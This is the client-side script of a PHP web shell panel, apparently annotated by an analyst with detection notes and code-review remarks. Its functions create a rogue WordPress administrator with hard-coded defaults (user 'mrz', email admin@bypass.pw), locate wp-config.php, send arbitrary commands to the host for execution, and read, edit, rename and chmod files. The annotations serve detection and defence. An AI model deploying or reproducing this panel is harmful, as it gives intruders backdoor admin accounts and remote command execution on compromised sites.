                statusText.textContent = \'Error: \' + e.message;
                statusText.style.color = \'var(--danger)\';
            } finally {
                btn.disabled = false;
            }
        }

        // POSTs config_path, user, pass and email to ?action=wp_admin_create on this
        // same script and reports the JSON result. Per the dialog text the server
        // side uses the given wp-config.php to create a WordPress administrator;
        // that handler is outside this excerpt.
        // Analyst note: blank fields fall back to the hard-coded defaults below
        // (user mrz, email admin@bypass.pw). A WordPress administrator account with
        // that username or email that nobody provisioned is a direct indicator of
        // this tool; audit the users table and rotate credentials if it is present.
        async function runWpAdminCreator() {
            const configInput = document.getElementById(\'wp-config-path\');
            const userInput = document.getElementById(\'wp-user\');
            const passInput = document.getElementById(\'wp-pass\');
            const emailInput = document.getElementById(\'wp-email\');
            const statusBox = document.getElementById(\'wp-status-box\');
            const statusText = document.getElementById(\'wp-status-text\');
            const btn = document.getElementById(\'btn-wp-create\');
            const detectBtn = document.getElementById(\'btn-wp-detect\');

            const configPath = configInput.value.trim();
            const user = userInput.value.trim();
            const pass = passInput.value.trim();
            const email = emailInput.value.trim();

            statusBox.style.display = \'block\';

            // Only the config path is mandatory; the other fields have defaults.
            if (!configPath) {
                statusText.textContent = \'Please provide wp-config.php path.\';
                statusText.style.color = \'var(--danger)\';
                return;
            }

            btn.disabled = true;
            detectBtn.disabled = true;
            statusText.textContent = \'Creating admin user...\';
            statusText.style.color = \'var(--text)\';

            const body = new URLSearchParams();
            body.append(\'config_path\', configPath);
            body.append(\'user\', user || \'mrz\');
            body.append(\'pass\', pass || \'admin\');
            body.append(\'email\', email || \'admin@bypass.pw\');

            try {
                // NOTE(review): PHP_SELF is interpolated into this JS string literal
                // without escaping; only the path value goes through urlencode().
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=wp_admin_create&path=';echo urlencode($encoded_base_dir); echo '\', {
                    method: \'POST\',
                    headers: { \'Content-Type\': \'application/x-www-form-urlencoded\' },
                    body: body.toString()
                });
                const data = await response.json();
                if (data.success) {
                    statusText.textContent = `Admin created: ${data.user} (${data.email})`;
                    statusText.style.color = \'var(--success)\';
                } else {
                    statusText.textContent = data.error || \'Failed to create admin user.\';
                    statusText.style.color = \'var(--danger)\';
                }
            } catch (e) {
                statusText.textContent = \'Error: \' + e.message;
                statusText.style.color = \'var(--danger)\';
            } finally {
                // Both buttons are re-enabled whatever the outcome.
                btn.disabled = false;
                detectBtn.disabled = false;
            }
        }

        // Requests ?action=wp_find_config on this same script and, on success,
        // copies data.path into the wp-config.php path field. How the server side
        // searches for the file is not visible in this excerpt.
        // Analyst note: action=wp_find_config followed by action=wp_admin_create in
        // access logs outlines the sequence used against a WordPress install.
        async function detectWpConfig() {
            const configInput = document.getElementById(\'wp-config-path\');
            const statusBox = document.getElementById(\'wp-status-box\');
            const statusText = document.getElementById(\'wp-status-text\');
            const btn = document.getElementById(\'btn-wp-detect\');
            const createBtn = document.getElementById(\'btn-wp-create\');

            statusBox.style.display = \'block\';
            statusText.textContent = \'Searching for wp-config.php...\';
            statusText.style.color = \'var(--text)\';
            btn.disabled = true;
            createBtn.disabled = true;

            try {
                // NOTE(review): PHP_SELF is interpolated into this JS string literal
                // without escaping; only the path value goes through urlencode().
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=wp_find_config&path=';echo urlencode($encoded_base_dir); echo '\');
                const data = await response.json();
                if (data.success) {
                    configInput.value = data.path;
                    statusText.textContent = \'Found: \' + data.path;
                    statusText.style.color = \'var(--success)\';
                } else {
                    statusText.textContent = data.error || \'No wp-config.php found.\';
                    statusText.style.color = \'var(--danger)\';
                }
            } catch (e) {
                statusText.textContent = \'Error: \' + e.message;
                statusText.style.color = \'var(--danger)\';
            } finally {
                btn.disabled = false;
                createBtn.disabled = false;
            }
        }

        // Pressing Enter in the terminal command field submits it through
        // runTerminalCommand() instead of the default key handling.
        document.getElementById(\'terminal-command\').addEventListener(\'keydown\', function (e) {
            if (e.key === \'Enter\') {
                e.preventDefault();
                runTerminalCommand();
            }
        });

        // Writes a one-line summary into #terminal-caps. Each key of the available
        // object is shown as key:on or key:off according to its truthiness, with an
        // optional Method prefix. A falsy available yields Capabilities: unknown.
        // NOTE(review): presumably the keys name the execution mechanisms the
        // server side probed; confirm against the terminal handler, which is
        // outside this excerpt.
        function setTerminalCaps(available, method) {
            const caps = document.getElementById(\'terminal-caps\');
            if (!available) {
                caps.textContent = \'Capabilities: unknown\';
                return;
            }
            const parts = Object.keys(available).map(key => `${key}:${available[key] ? \'on\' : \'off\'}`);
            const prefix = method ? `Method: ${method} | ` : \'\';
            caps.textContent = `${prefix}Capabilities: ${parts.join(\' | \')}`;
        }

        // Sends the text of the terminal-command field to this same script and shows
        // the reply in terminal-output.
        // Request: POST to PHP_SELF with action=terminal and path in the query string,
        //          form-encoded body carrying cmd, plus mode=all when the
        //          terminal-test-all checkbox is ticked.
        // Reply:   JSON with success, and either outputs (a map rendered as [key]
        //          sections) or output, together with available, method and error.
        // NOTE(review): the server-side handler for action=terminal is not in view;
        // presumably it executes cmd on the host. Confirm against the PHP part.
        // Detection note: the query string action=terminal on a POST to a PHP file is
        // visible in web server access logs; the cmd field only where request bodies
        // are logged or inspected.
        async function runTerminalCommand() {
            const output = document.getElementById(\'terminal-output\');
            const status = document.getElementById(\'terminal-status\');
            const cmdInput = document.getElementById(\'terminal-command\');
            const testAll = document.getElementById(\'terminal-test-all\');
            const cmd = cmdInput.value.trim();

            // Nothing is sent for an empty or whitespace-only command.
            if (!cmd) {
                output.textContent = \'Please enter a command.\';
                return;
            }

            status.textContent = \'Running...\';
            output.textContent = \'Executing...\';

            const body = new URLSearchParams();
            body.append(\'cmd\', cmd);
            // mode=all is only added when the checkbox exists and is checked.
            if (testAll && testAll.checked) {
                body.append(\'mode\', \'all\');
            }

            // PHP_SELF is emitted into the script text without escaping.
            try {
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=terminal&path=';echo urlencode($encoded_base_dir); echo '\', {
                    method: \'POST\',
                    headers: { \'Content-Type\': \'application/x-www-form-urlencoded\' },
                    body: body.toString()
                });
                const data = await response.json();
                if (data.success) {
                    if (data.outputs) {
                        // Multi-result reply: one [key] header per entry, then its text.
                        const lines = [];
                        Object.keys(data.outputs).forEach(key => {
                            const val = data.outputs[key];
                            lines.push(`[${key}]`);
                            lines.push(val ? val : \'(no output)\');
                            lines.push(\'\');
                        });
                        // textContent is used, so the reply is shown as plain text.
                        output.textContent = lines.join(\'\\n\').trim();
                        setTerminalCaps(data.available);
                    } else {
                        output.textContent = data.output || \'(no output)\';
                        setTerminalCaps(data.available, data.method);
                    }
                } else {
                    output.textContent = data.error || \'Command failed.\';
                    setTerminalCaps(data.available);
                }
            } catch (e) {
                // Covers network failures and replies that are not valid JSON.
                output.textContent = \'Error: \' + e.message;
            } finally {
                status.textContent = \'Idle\';
                cmdInput.select();
            }
        }

        // Requests action=scan for the directory typed into scan-path-input and renders
        // the JSON reply as rows of the finder table.
        // Reply shape used here: an array of items with path, name and risks, where
        // each risk has sig and desc. An empty array shows the "no signatures" row.
        // NOTE(review): item.path, r.sig and r.desc are concatenated into innerHTML
        // without escaping, so file names or signature text containing markup are
        // parsed as HTML by the browser. This matters when the panel is opened during
        // analysis of a captured sample.
        // NOTE(review): the status label is set to Completed in finally, so it also
        // appears after a failed or timed-out scan.
        async function runScan() {
            const tbody = document.getElementById(\'finder-tbody\');
            const status = document.getElementById(\'scan-status\');
            const btn = document.getElementById(\'btn-start-scan\');
            const scanPath = document.getElementById(\'scan-path-input\').value;

            tbody.innerHTML = \'<tr><td colspan="3" style="text-align: center; padding: 40px;">Scanning files... please wait.</td></tr>\';
            status.innerText = \'Scanning...\';
            btn.disabled = true;

            // GET request to this same script; scan_path is URI-encoded client side.
            try {
                const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=scan&scan_path=\' + encodeURIComponent(scanPath));
                const data = await response.json();

                if (data.length === 0) {
                    tbody.innerHTML = \'<tr><td colspan="3" style="text-align: center; padding: 40px; color: var(--success);">No suspicious signatures found in this directory.</td></tr>\';
                } else {
                    tbody.innerHTML = \'\';
                    data.forEach(item => {
                        let risks = item.risks.map(r => `<span style="color: #ffcc00; font-size: 0.75rem; display: block;">• ${r.sig}: ${r.desc}</span>`).join(\'\');
                        tbody.innerHTML += `
                            <tr>
                                <td style="font-family: monospace; font-size: 0.8rem;">${item.path}</td>
                                <td>${risks}</td>
                                <td><a href="javascript:void(0)" class="action-link" onclick="closeModal(\'modal-finder\'); editFile(\'${encodeURIComponent(item.name)}\')">Investigate</a></td>
                            </tr>
                        `;
                    });
                }
            } catch (e) {
                tbody.innerHTML = \'<tr><td colspan="3" style="text-align: center; padding: 40px; color: var(--danger);">Scan failed or timed out.</td></tr>\';
            } finally {
                status.innerText = \'Completed\';
                btn.disabled = false;
            }
        }

        // Loads a file into the edit modal.
        //   name: URI-encoded file name; it is decoded for display and for the hidden
        //         edit-file-input field, and appended still encoded to the request URL.
        // Request: GET to PHP_SELF with action=read, file and path in the query string;
        //          the reply body is placed as text into the edit-content field.
        // NOTE(review): there is no try/catch and no check of the HTTP status, so an
        // error page returned by the server would be shown as if it were file content.
        // Detection note: action=read with a file parameter on a PHP script shows up
        // in access logs as a plain GET.
        async function editFile(name) {
            const fileName = decodeURIComponent(name);
            document.getElementById(\'edit-filename\').innerText = fileName;
            document.getElementById(\'edit-file-input\').value = fileName;

            const response = await fetch(\'';echo $_SERVER['PHP_SELF']; echo '?action=read&file=\' + name + \'&path=';echo urlencode($encoded_base_dir); echo '\');
            const data = await response.text();
            document.getElementById(\'edit-content\').value = data;
            document.getElementById(\'modal-edit\').style.display = \'flex\';
        }

        // Opens the rename modal with both the old-name and new-name fields prefilled
        // with the decoded form of name (expected URI-encoded).
        // Only the form is prepared here; its submission is not part of this function.
        function renameItem(name) {
            document.getElementById(\'rename-old\').value = decodeURIComponent(name);
            document.getElementById(\'rename-new\').value = decodeURIComponent(name);
            document.getElementById(\'modal-rename\').style.display = \'flex\';
        }

        // Opens the chmod modal for one entry.
        //   name: URI-encoded entry name, decoded before it is placed in chmod-item.
        //   mode: current mode value, copied unchanged into chmod-mode.
        // Only the form is prepared here; its submission is not part of this function.
        function chmodItem(name, mode) {
            document.getElementById(\'chmod-item\').value = decodeURIComponent(name);
            document.getElementById(\'chmod-mode\').value = mode;
            document.getElementById(\'modal-chmod\').style.display = \'flex\';
        }
    </script>
</body>

</html>';


